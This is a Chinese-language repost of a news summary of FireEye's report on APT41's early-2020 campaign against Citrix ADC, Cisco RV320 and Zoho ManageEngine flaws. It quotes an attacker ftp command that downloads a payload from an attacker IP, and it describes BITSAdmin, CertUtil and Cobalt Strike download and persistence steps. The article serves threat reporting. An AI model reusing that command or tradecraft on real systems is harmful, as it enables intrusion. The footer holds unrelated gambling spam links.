安基網 首頁 資訊 安全報 查看內容

美安全公司FireEye:中國黑客組織APT41試圖發起全球入侵活動

2020-3-30 12:41| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 美國網絡安全巨頭FireEye于近日發文稱,被他們判定來自中國的黑客組織APT41從今年年初開始發起了自該組織成立以來規模最大的入侵活動,波及澳大利亞、加拿大、丹麥、芬蘭、法國、印度、意大利、日本、馬來西亞、墨西哥、菲律賓、波蘭、卡塔爾、沙特阿拉伯、新加坡、瑞典、瑞士、阿聯酋、英國以及美國等 ...


美國網絡安全巨頭FireEye于近日發文稱,被他們判定來自中國的黑客組織APT41從今年年初開始發起了自該組織成立以來規模最大的入侵活動,波及澳大利亞、加拿大、丹麥、芬蘭、法國、印度、意大利、日本、馬來西亞、墨西哥、菲律賓、波蘭、卡塔爾、沙特阿拉伯、新加坡、瑞典、瑞士、阿聯酋、英國以及美國等數十個國家。

FireEye在文章中指出,在1月20日至3月11日期間,APT41利用Citrix NetScaler/ADC、思科路由器以及Zoho ManageEngine Desktop Central中的漏洞攻擊了分屬銀行/金融、建筑、國防、政府、醫療、高科技、高等教育、法律、制造業、媒體、非營利、石油和天然氣、石化、制藥、房地產、電信、運輸、旅行以及軟件等眾多行業的組織,其中有超過75家是FireEye的客戶。

為了證實其說法的真實性,FireEye在文章中還公布了他們針對這起入侵活動的調查成果。接下來,就讓我們一起來看看吧。

CVE-2019-19781(Citrix ADC漏洞)利用活動

FireEye表示,APT41從1月20日開始試圖利用CVE-2019-19781(于2019年12月17日被公開披露)入侵Citrix Application Delivery Controller(ADC)和Citrix Gateway設備。

圖1.FireEye整理的關鍵事件時間表

1月20日和1月21日的CVE-2019-19781漏洞利用活動涉及到執行命令“file /bin/pwd”,這可以幫助APT41實現兩個目標:一是能夠確認系統是否已安裝補丁,進而判斷設備是否能夠被入侵;二是能夠獲取到與系統體系結構相關的信息(據稱,這是為了給后續部署后門做準備)。

圖2.CVE-2019-19781漏洞利用HTTP流量示例(1月20日和1月21日)

1月23至2月1日,漏洞利用活動出現了短暫的中斷。FireEye認為,這很可能與1月24日至1月30期間的中國農歷新年假期有關。

從2月1日開始,APT41開始執行命令“/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]@66.42.98[.]220/bsd”,以下載被命名為“bsd”的有效載荷(被FireEye懷疑是一種新后門)。

圖3.CVE-2019-19781漏洞利用HTTP流量示例(2月1日)

2月2日至2月19日,漏洞利用活動再次中斷。FireEye認為,這很可能與中國爆發的新型肺炎疫情有關。

2月24日和2月25日,針對CVE-2019-19781的漏洞利用明顯增加,且利用行為幾乎與2月1日的活動幾乎完全一致,僅僅是將有效載荷的名稱更改為了“un”。

圖4. CVE-2019-19781漏洞利用HTTP流量示例(2月24日和2月25日)

思科路由器漏洞利用活動

FireEye表示,APT41在2月21日成功利用漏洞侵入了一家電信組織的Cisco RV320路由器,并下載了名為“fuc”的有效載荷。盡管尚不清楚利用的是哪些漏洞,但可以的是,其中一個模塊結合利用了CVE-2019-1653和CVE-2019-1652,這允許攻擊者在Cisco RV320和RV325小型企業路由器上實現遠程代碼執行,并使用wget下載指定的有效載荷。

圖5.Cisco RV320路由器通過wget下載有效載荷的HTTP請求示例

CVE-2020-10189(Zoho ManageEngine零日漏洞)利用活動

FireEye表示,APT41從3月8日開始試圖利用CVE-2020-10189攻擊目標組織,設計兩種有效載荷部署方式。

第一種方式涉及利用CVE-2020-10189漏洞直接上傳基于Java的簡單程序“logger.zip”,其中包含一組可用于使用PowerShell下載并執行install.bat和storesyncsvc.dll的命令。

圖6.logger.zip的內容

第二種方式涉及利用Microsoft BITSAdmin命令行工具從端口12345上的已知APT41基礎設施66[.]42[.]98[.]220下載install.bat。

無論是方式一還是方式二,它們都涉及到使用install.bat來實現被命名為“storesyncsvc.dll”的Cobalt Strike BEACON加載程序的長久駐留。

圖7.install.bat的內容

在漏洞利用成功之后,APT41使用storecyncsvc.dll BEACON后門下載了另一個具有不同C2地址的輔助后門,進而利用該后門下載了2.exe(VMProtected Meterpreter下載器,用于下載Cobalt Strike BEACON shellcode)。

圖8.通過CertUtil下載2.exe的HTTP請求示例

Meterpreter下載器“TzGG”被配置為通過端口443與91[.]208[.]184[.]78通信,以下載Cobalt Strike BEACON(試用版)的shellcode。

圖9.下載Cobalt Strike BEACON shellcode的HTTP請求示例

結語

FireEye表示,在這場規模龐大的入侵活動中,盡管APT41使用的是一些公開可用的惡意軟件(如Cobalt Strike和Meterpreter),但從該組織此前的活動來看,他們必定會在后續部署更為高級的惡意軟件。

FireEye還表示,即使到了2020年,APT41在他們所追蹤的黑客組織中仍是最強勁的一個。新發現的這場入侵活動也再次表明,該組織確實擁有快速利用新披露的漏洞來發起攻擊的能力。



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6808358417086808583/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人
1

路過

雞蛋

剛表態過的朋友 (1 人)

相關閱讀

最新評論

 最新
返回頂部
洗衣店赚钱联系澳洁 体彩11选5中奖规则表 3d福乐彩 河北快三退票 期货配资公司合法吗 好运彩app下载 股票大盘趋势分析 广西快3间隔值统计表 江西11选五5开奖结果双 幸运飞艇最快开奖官网 福建体彩31选7大星走势图表